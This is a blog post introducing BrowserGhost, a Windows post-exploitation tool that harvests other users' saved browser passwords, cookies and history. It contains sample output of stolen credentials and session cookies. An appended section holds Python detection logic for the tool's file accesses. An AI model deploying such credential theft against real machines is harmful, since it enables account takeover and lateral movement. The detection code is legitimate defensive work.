
BrowserGhost: a tool for extracting browser passwords

zZ华 2023-02-18, posted from Guangdong

BrowserGhost

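Introduction:

This is a tool for extracting browser passwords; more features will be added later.

Features completed so far:

Running as SYSTEM, it extracts the browser passwords of other users on the machine (convenient for quick credential collection during lateral movement)

Implemented on .NET 2 so that it is compatible with most Windows versions, with dependencies removed (no need for extras such as System.Data.SQLite.dll)

Can decrypt passwords from all Chrome versions (the encryption scheme changed after Chrome 80)

For Chrome, login data, cookies, history, and bookmarks can now be retrieved

For IE, bookmarks, passwords, and history can now be retrieved (extracting passwords in .NET 2 is too complicated; the code is based on https://github.com/djhohnstein/SharpWeb/raw/master/Edge/SharpEdge.cs)

To do:

Retrieving IE History under SYSTEM privileges has some problems

Improve the output

Monitor cookies in real time

Support other mainstream browsers (Firefox, 360 Extreme Browser, etc.)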

C:\Users\Administrator\Desktop>BrowserGhost.exe
[+] Current user Administrator
[*] [4764] [explorer] [Administrator]
[*] Impersonate user Administrator
[*] Current user Administrator
===============Chrome=============

[*]Get Chrome Login Data
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[URL] -> https://xui.ptlogin2.qq.com/cgi-bin/xlogin
[USERNAME] -> n0thing@gmail.com
[PASSWORD] -> Iloveprettygirls

[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp

[*]Get Chrome Bookmarks
{ 'checksum': 'eee70b132cc4f9644d01f989e18fdb38', 'roots': { 'bookmark_bar': { 'children': [ { 'date_added': '13236861887917624', 'guid': 'c5df2041-d745-4173-af39-b5c48f8d98a2', 'id': '5', 'name': 'GitHub', 'type': 'url', 'url': 'https://github.com/' } ], 'date_added': '13236861618031351', 'date_modified': '13236861887917624', 'guid': '00000000-0000-4000-a000-000000000002', 'id': '1', 'name': '书签栏', 'type': 'folder' }, 'other': { 'children': [ ], 'date_added': '13236861618031378', 'date_modified': '0', 'guid': '00000000-0000-4000-a000-000000000003', 'id': '2', 'name': '其他书签', 'type': 'folder' }, 'synced': { 'children': [ ], 'date_added': '13236861618031381', 'date_modified': '0', 'guid': '00000000-0000-4000-a000-000000000004', 'id': '3', 'name': '移动设备书签', 'type': 'folder' } }, 'version': 1}

[*]Get Chrome Cookie
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies to C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[github.com] _device_id=516175fxxxxxxxxx90133c2
[.github.com] _octo=GH1.1.3xxxxxxxxx5173
[.google.com] NID=204=DEIRBPT8FML_IsHGv1B2xxxxxxxxxxxxxxxxxxxSRlaNRV3-nfhFV8aHAgO6Smtf4JXQqR-W63p0KOVKgVd0VCXv4bKww97DEhc-PI1sVdbD4hGOuVwchN4Bwo-V61AtfjZM
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp

[*]Get Chrome History
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\History to C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
http://github.com/ The world’s leading software development platform · GitHub
https://github.com/ GitHub
https://github.com/login Sign in to GitHub · GitHub

[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
===============IE=============

[*]Get IE Books
C:\Users\Administrator\Favorites\Sign in to GitHub · GitHub.url
URL=https://github.com/session

[*]Get IE Password
Vault Type : Web Credentials
Resource : https://github.com/
Identity : n0thing@gmail.com
Credential : Iloveprettygirls
LastModified : 2020/6/17 7:08:50

[*]Get IE History
https://github.com/login
https://github.com/join
https://github.com/john
https://github.com/sign
http://github.com/
http://go.microsoft.com/fwlink/p/?LinkId=255141
[*] Recvtoself
[*] Current user Administrator
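Detection logic for the file accesses visible in the output above, added here as an example and not part of BrowserGhost or the original post: it flags access to Chrome's Login Data, Cookies and History by any image other than chrome.exe. It assumes object-access auditing (Security event 4663) is enabled on those files; the sample events, the allowlist paths and the names classify and scan are constructed for illustration.

```python
import re

# Chrome stores the tool output shows being copied: Login Data, Cookies, History.
# Newer Chrome builds keep Cookies under <profile>\Network, so allow that too.
CHROME_STORE = re.compile(
    r"^C:\\Users\\(?P<owner>[^\\]+)\\AppData\\Local\\Google\\Chrome\\User Data\\"
    r"[^\\]+\\(?:Network\\)?(?P<store>Login Data|Cookies|History)$",
    re.IGNORECASE,
)
# Assumption: the only images expected to open these files. Adjust per fleet.
ALLOWED_IMAGES = {
    r"c:\program files\google\chrome\application\chrome.exe",
    r"c:\program files (x86)\google\chrome\application\chrome.exe",
}

def classify(event):
    """Return a finding dict for a suspicious access, or None if benign."""
    m = CHROME_STORE.match(event["ObjectName"])
    if not m or event["ProcessName"].lower() in ALLOWED_IMAGES:
        return None
    owner, actor = m.group("owner"), event["SubjectUserName"]
    # The tool impersonates the profile owner, so the account often matches;
    # the non-browser image is the primary signal, a mismatch only raises severity.
    severity = "high" if actor.lower() != owner.lower() else "medium"
    return {"store": m.group("store"), "owner": owner, "actor": actor,
            "process": event["ProcessName"], "severity": severity}

def scan(events):
    return [f for f in map(classify, events) if f is not None]

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PROFILE = r"\AppData\Local\Google\Chrome\User Data\Default"
# Constructed sample records using Security event 4663 field names.
SAMPLE_EVENTS = [
    {"SubjectUserName": "Administrator", "ProcessName": CHROME,
     "ObjectName": r"C:\Users\Administrator" + PROFILE + r"\Login Data"},
    {"SubjectUserName": "Administrator",
     "ProcessName": r"C:\Users\Administrator\Desktop\BrowserGhost.exe",
     "ObjectName": r"C:\Users\Administrator" + PROFILE + r"\Login Data"},
    {"SubjectUserName": "bob", "ProcessName": r"C:\Windows\Temp\collector.exe",
     "ObjectName": r"C:\Users\alice" + PROFILE + r"\Network\Cookies"},
    {"SubjectUserName": "alice", "ProcessName": r"C:\Windows\notepad.exe",
     "ObjectName": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Matching on the full image path rather than the file name keeps a renamed binary called chrome.exe in another directory from passing the allowlist.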


Project URL: https://github.com/QAX-A-Team/BrowserGhost
